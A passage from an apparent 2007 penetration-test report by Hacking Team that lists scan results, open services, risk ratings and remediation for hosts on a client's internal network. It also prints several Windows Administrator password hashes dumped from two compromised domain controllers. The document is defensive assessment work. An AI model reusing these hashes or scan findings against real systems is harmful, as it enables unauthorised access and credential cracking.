898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
1158/tcp open http Oracle Application Server httpd 9.0.4.1.0
1522/tcp open oracle-tns Oracle TNS Listener
3000/tcp open http Apache httpd 1.3.34 ((Unix) mod_ssl/2.8.10
OpenSSL/0.9.6l mod_perl/1.25)
4045/tcp open nlockmgr 1-4 (rpc #100021)
5520/tcp open sdlog Oracle Enterprise Manager
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
32786/tcp open kcms_server 1 (rpc #100221)
32787/tcp open kcms_server 1 (rpc #100221)
Uptime: 108.700 days (since Sat Mar 31 12:38:31 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=154 (Good luck!)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 109 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdwha, .mtsdwha; OSs: Solaris, Unix
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
Fingerd daemon allows an attacker to gain information about the system users.
6.3.10 192.168.254.7 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Sun StorEdge T300
Hostname MTSDWHB
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 110 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
665/tcp open unknown
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
3000/tcp open http Apache httpd 1.3.34 ((Unix) mod_ssl/2.8.10
OpenSSL/0.9.6l mod_perl/1.25)
4045/tcp open nlockmgr 1-4 (rpc #100021)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
32774/tcp open ttdbserverd 1 (rpc #100083)
32775/tcp open ttdbserverd 1 (rpc #100083)
32776/tcp open kcms_server 1 (rpc #100221)
32777/tcp open kcms_server 1 (rpc #100221)
32778/tcp open metad 1-2 (rpc #100229)
32779/tcp open metad 1-2 (rpc #100229)
32780/tcp open metamhd 1 (rpc #100230)
32786/tcp open rpc.metamedd 1 (rpc #100242)
32787/tcp open rpc.metamedd 1 (rpc #100242)
Uptime: 52.264 days (since Sat May 26 23:10:40 2007)
Network Distance: 2 hops
IPID Sequence Generation: Busy server or unknown class
Service Info: Hosts: mtsdwhb, .mtsdwhb; OSs: Solaris, Unix
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
Fingerd daemon allows an attacker to gain information about the system users.
6.3.11 192.168.254.8 [Unsafe]
Rating: unsafe
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 111 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
665/tcp open unknown
898/tcp open http Solaris management console server (Java 1.4.2_08;
Tomcat 2.1; SunOS 5.9 sparc)
1158/tcp open http Oracle Application Server httpd 9.0.4.1.0
1522/tcp open oracle-tns Oracle TNS Listener
4045/tcp open nlockmgr 1-4 (rpc #100021)
5520/tcp open sdlog Oracle Enterprise Manager
6112/tcp open dtspc?© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 112 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
32786/tcp open kcms_server 1 (rpc #100221)
32787/tcp open kcms_server 1 (rpc #100221)
Uptime: 108.706 days (since Sat Mar 31 12:38:31 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=152 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdwha, .mtsdwha; OSs: Solaris, Unix, SunOS
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
Fingerd daemon allows an attacker to gain information about the system users.
6.3.12 192.168.254.9 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 113 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
665/tcp open unknown
898/tcp open http Solaris management console server (Java 1.4.2_08;
Tomcat 2.1; SunOS 5.9 sparc)
4045/tcp open nlockmgr 1-4 (rpc #100021)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
32774/tcp open ttdbserverd 1 (rpc #100083)
32775/tcp open ttdbserverd 1 (rpc #100083)
32776/tcp open kcms_server 1 (rpc #100221)
32777/tcp open kcms_server 1 (rpc #100221)
32778/tcp open metad 1-2 (rpc #100229)
32779/tcp open metad 1-2 (rpc #100229)
32780/tcp open metamhd 1 (rpc #100230)
32786/tcp open rpc.metamedd 1 (rpc #100242)
32787/tcp open rpc.metamedd 1 (rpc #100242)
Uptime: 108.715 days (since Sat Mar 31 12:29:50 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=159 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdwhb, .mtsdwhb; OSs: Solaris, Unix, SunOS
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 114 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
Fingerd daemon allows an attacker to gain information about the system users.
6.3.13 192.168.254.11 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
190/tcp filtered gacp
360/tcp filtered scoi2odialog
504/tcp filtered citadel
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 115 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
665/tcp open unknown
898/tcp open http Solaris management console server (Java
1.4.2_08; Tomcat 2.1; SunOS 5.9 sparc)
1669/tcp filtered netview-aix-9
4045/tcp open nlockmgr 1-4 (rpc #100021)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
32774/tcp open ttdbserverd 1 (rpc #100083)
32775/tcp open ttdbserverd 1 (rpc #100083)
32776/tcp open kcms_server 1 (rpc #100221)
32777/tcp open kcms_server 1 (rpc #100221)
32778/tcp open metad 1-2 (rpc #100229)
32779/tcp open metad 1-2 (rpc #100229)
32780/tcp open metamhd 1 (rpc #100230)
32786/tcp open rpc.metamedd 1 (rpc #100242)
32787/tcp open rpc.metamedd 1 (rpc #100242)
Uptime: 108.723 days (since Sat Mar 31 12:29:50 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=147 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdwhb, .mtsdwhb; OSs: Solaris, Unix, SunOS
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
Fingerd daemon allows an attacker to gain information about the system users.
6.3.14 192.168.254.12 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 116 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname Not detected
Compromised No Info None
Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
665/tcp open unknown
898/tcp open http Solaris management console server (Java 1.4.2_08;
Tomcat 2.1; SunOS 5.9 sparc)
1158/tcp open http Oracle Application Server httpd 9.0.4.1.0
1521/tcp open oracle-tns Oracle TNS Listener
1522/tcp open oracle-tns Oracle TNS Listener
4045/tcp open nlockmgr 1-4 (rpc #100021)
5520/tcp open sdlog Oracle Enterprise Manager
6112/tcp open dtspc?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 117 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
7100/tcp open font-service Sun Solaris fs.auto
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)
13783/tcp open vnetd Veritas Netbackup Network Utility
32786/tcp open rpc
32787/tcp open kcms_server 1 (rpc #100221)
Uptime: 108.720 days (since Sat Mar 31 12:38:31 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=144 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtsdwha, .mtsdwha; OSs: Solaris, Unix, SunOS
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
Fingerd daemon allows an attacker to gain information about the system users.
6.3.15 192.168.254.23 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Server 2003 3790 SP1
Hostname MTSWINDC1
Compromised Compromised by Active Directory Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 118 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
2301/tcp open http HP Proliant System Management 2.1.2.127
(CompaqHTTPServer 9.9)
3389/tcp open microsoft-rdp Microsoft Terminal Service
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
3588 password hashes were retrieved:
Administrator:500:NO PASSWORD*********************:A58D6B274B9B6B95A8E6541ED59209C2:::
Administrator_history_0:500:NO PASSWORD*********************:21042AF9036C47AA559AC2997BD3EA26:::
Administrator_history_1:500:BAD46F99BA178C94E72C57EF50F76A05:9FEC52907E16A15AB68EB3A08BF771A0:::
Administrator_history_2:500:F0D412BD764FFE81AAD3B435B51404EE:209C6174DA490CAEB422F3FA5A7AE634:::
etc. etc.
6.3.16 192.168.254.24 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 119 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Server 2003 3790 SP1
Hostname MTSWINDC2
Compromised Compromised by Active
Directory
Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
53/tcp open domain Microsoft DNS
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
2301/tcp open http HP Proliant System Management 2.1.2.127
(CompaqHTTPServer 9.9)
3389/tcp open microsoft-rdp Microsoft Terminal Service
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
3588 password hashes were retrived:
3588 password hashes were retrived:
Administrator:500:NO PASSWORD*********************:A58D6B274B9B6B95A8E6541ED59209C2:::
Administrator_history_0:500:NO PASSWORD*********************:21042AF9036C47AA559AC2997BD3EA26:::
Administrator_history_1:500:BAD46F99BA178C94E72C57EF50F76A05:9FEC52907E16A15AB68EB3A08BF771A0:::
Administrator_history_2:500:F0D412BD764FFE81AAD3B435B51404EE:209C6174DA490CAEB422F3FA5A7AE634:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 120 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
etc. etc.
6.3.17 192.168.254.230 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Sun StorEdge T300
Hostname MILBVALPHA
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Sun Solaris 8 ftpd
23/tcp open telnet Sun Solaris telnetd
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
1521/tcp open oracle-tns Oracle TNS Listener
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 121 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
2401/tcp open cvspserver cvs pserver
4045/tcp open nlockmgr 1-4 (rpc #100021)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
32771/tcp open status 1 (rpc #100024)
32772/tcp open rusersd 2-3 (rpc #100002)
32773/tcp open ttdbserverd 1 (rpc #100083)
32774/tcp open rpc
32775/tcp open metad 1 (rpc #100229)
32776/tcp open metamhd 1 (rpc #100230)
32777/tcp open sometimes-rpc17?
32778/tcp open sometimes-rpc19?
32779/tcp open dmispd 1 (rpc #300598)
32780/tcp open snmpXdmid 1 (rpc #100249)
Uptime: 230.506 days (since Wed Nov 29 17:44:04 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=139 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Host: milbvalpha; OS: Solaris
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
Fingerd daemon allows an attacker to gain information about the system users.
6.3.18 192.168.254.250 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates, especially TCP/IP stack related ones
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 122 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vendor/OS Checkpoint Version FW-1
Hostname Not detected
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.1p1 (protocol 2.0)
256/tcp open fw1-topology Checkpoint FW1 Topology
257/tcp open fw1-log Checkpoint Firewall1 logging service
259/tcp open telnet Check Point FireWall-1 Client Authenticaton Server
262/tcp open tcpwrapped
264/tcp open fw1-topo Checkpoint FW-1 Topology download
443/tcp open ssl/http Apache httpd
500/tcp open isakmp?
900/tcp open http Check Point Firewall-1 Client Authentication httpd
1029/tcp open ms-lsa?
1030/tcp open iad1?
1031/tcp open iad2?
1032/tcp open iad3?
1033/tcp open fw1-rlogin Check Point FireWall-1 authenticated RLogin server
(mtsh-fw1)
18183/tcp open fw1-topo Checkpoint FW-1 Topology download
18184/tcp open fw1-topo Checkpoint FW-1 Topology download
18187/tcp open fw1-topology Checkpoint FW1 Topology
Uptime: 189.211 days (since Tue Jan 9 23:14:53 2007)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Device: firewall
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.3.19 192.168.254.252 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 123 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates, especially TCP/IP stack related ones
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Unix Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.1p1 (protocol 2.0)
256/tcp open fw1-topology Checkpoint FW1 Topology
257/tcp open fw1-log Checkpoint Firewall1 logging service
259/tcp open telnet Check Point FireWall-1 Client Authenticaton Server
262/tcp open tcpwrapped
264/tcp open fw1-topo Checkpoint FW-1 Topology download
443/tcp open ssl/http Apache httpd
500/tcp open isakmp?
900/tcp open http Check Point Firewall-1 Client Authentication httpd
1029/tcp open ms-lsa?
1030/tcp open iad1?
1031/tcp open iad2?
1032/tcp open iad3?
1033/tcp open fw1-rlogin Check Point FireWall-1 authenticated RLogin server
(mtsh-fw1)
18183/tcp open fw1-topo Checkpoint FW-1 Topology download
18184/tcp open fw1-topo Checkpoint FW-1 Topology download
18187/tcp open fw1-topo Checkpoint FW-1 Topology download
Uptime: 189.282 days (since Tue Jan 9 23:14:54 2007)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Device: firewall
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 124 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.3.20 192.168.254.15 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp?
22/tcp open ssh?
25/tcp open smtp Sendmail 8.11.7p1+Sun/8.10.2
111/tcp open rpcbind 2-4 (rpc #100000)
540/tcp open uucp?
587/tcp open submission?
665/tcp open unknown
1521/tcp open oracle?
1526/tcp open pdap-np?
4045/tcp open lockd?
6112/tcp open dtspc?
7000/tcp open afs3-fileserver?
7100/tcp open font-service Sun Solaris fs.auto
8000/tcp open http Apache httpd 1.3.9 ((Unix) ApacheJServ/1.1
mod_perl/1.21)
13722/tcp open netbackup Veritas Netbackup java listener
13782/tcp open bpcd Veritas Netbackup (refused)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 125 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
13783/tcp open vnetd Veritas Netbackup Network Utility
32771/tcp open status 1 (rpc #100024)
32772/tcp open rusersd 2-3 (rpc #100002)
32773/tcp open ttdbserverd 1 (rpc #100083)
32774/tcp open kcms_server 1 (rpc #100221)
32775/tcp open dr_daemon 4 (rpc #300326)
32776/tcp open metad 1 (rpc #100229)
32777/tcp open metamhd 1 (rpc #100230)
32778/tcp open sometimes-rpc19?
32779/tcp open dmispd 1 (rpc #300598)
Uptime: 262.301 days (since Sat Oct 28 22:44:22 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=157 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Host: mtsgroup.org; OSs: Unix, Solaris
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
6.3.21 192.168.254.70 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS EMC, Unix Version EMC-SNAS: 5.5.24.2
Hostname SERVER_2
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 126 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
111/tcp open rpc
1234/tcp open mountd 1-3 (rpc #100005)
2049/tcp open nfs 2-3 (rpc #100003)
8888/tcp open arcserve ARCserve Discovery
10000/tcp open snet-sensor-mgmt?
12345/tcp open curved 1-3 (rpc #536870919)
Uptime: 206.346 days (since Sat Dec 23 21:04:31 2006)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=65 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Host: RCP_MAGIC_ACK
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
6.3.22 192.168.254.161 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Redhat Linux
Hostname MTSDFEED2
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp vsftpd 1.1.0
22/tcp open ssh OpenSSH 3.4p1 (protocol 1.99)
111/tcp open rpcbind 2 (rpc #100000)
2301/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.94)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 127 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
3306/tcp open mysql MySQL (unauthorized)
Uptime: 117.175 days (since Fri Mar 23 01:20:06 2007)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OSs: Unix, Windows
Ftpd is cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
6.3.23 192.168.254.235 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows XP
Hostname BVADTPC01
Compromised No Info None
